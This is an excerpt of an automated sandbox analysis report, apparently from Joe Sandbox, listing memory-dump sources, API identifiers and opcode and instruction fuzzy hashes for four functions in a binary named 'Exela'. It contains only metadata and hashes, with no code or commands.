                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                            • String ID: Error detected
                                                                                                                                                                                                                                                            • API String ID: 1878133881-3513342764
                                                                                                                                                                                                                                                            • Opcode ID: 04587b85e8c5a5f01c124244adb340557da1a3c376205467b785ddfdae2ba4e1
                                                                                                                                                                                                                                                            • Instruction ID: bc351c6d1845a0fe97a8dfad5808d44be36f202d7cfb17d46640d381de1046a6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04587b85e8c5a5f01c124244adb340557da1a3c376205467b785ddfdae2ba4e1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C210573728A8181E720DB18F4523EAB764FF84784F800135E68D97AA9DF3DD255CB05
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                            • String ID: Fatal error detected
                                                                                                                                                                                                                                                            • API String ID: 1878133881-4025702859
                                                                                                                                                                                                                                                            • Opcode ID: b6f7d9423fd809a91d1653bcdf9902987ab7b8a697f00e322c081d77e498ae58
                                                                                                                                                                                                                                                            • Instruction ID: f09bbac8a7b55a8c088e258ae24795204442b0119e28fb5de048987196ac36f8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6f7d9423fd809a91d1653bcdf9902987ab7b8a697f00e322c081d77e498ae58
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D21E573728A8281E720DB19F4527EAB764FF84784F800035E68D97AA9DF3DD245CB05
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                            • Opcode ID: c8cc4bb08b20690d02c8bce5cff6a9b5d4d552f887a177c474232a7ea1470dcf
                                                                                                                                                                                                                                                            • Instruction ID: 0e1c246dc37f5bcb07205e7c2fb34d11c075a565d60a6a350d6e1450de76f1f4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8cc4bb08b20690d02c8bce5cff6a9b5d4d552f887a177c474232a7ea1470dcf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9115133618B8082DB61CB29F444259BBE4FB98B94F584270DBCD577A9DF3DC5918B04
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                                                            • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                            • Opcode ID: 0bb087a2c4c4f6707d1aaf47450714c5cfb5908953c580e39f9c8bdb8a3b6409
                                                                                                                                                                                                                                                            • Instruction ID: dfab1a3d5f52ce2a3ec5235b37eb3ff5382f2d0a2fdf58a6609f7387de163c0b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0bb087a2c4c4f6707d1aaf47450714c5cfb5908953c580e39f9c8bdb8a3b6409
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97018463B1C64289F720EF6894A73BE6BA0EF44704F410035D54DD6695EE3EE584CB1A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%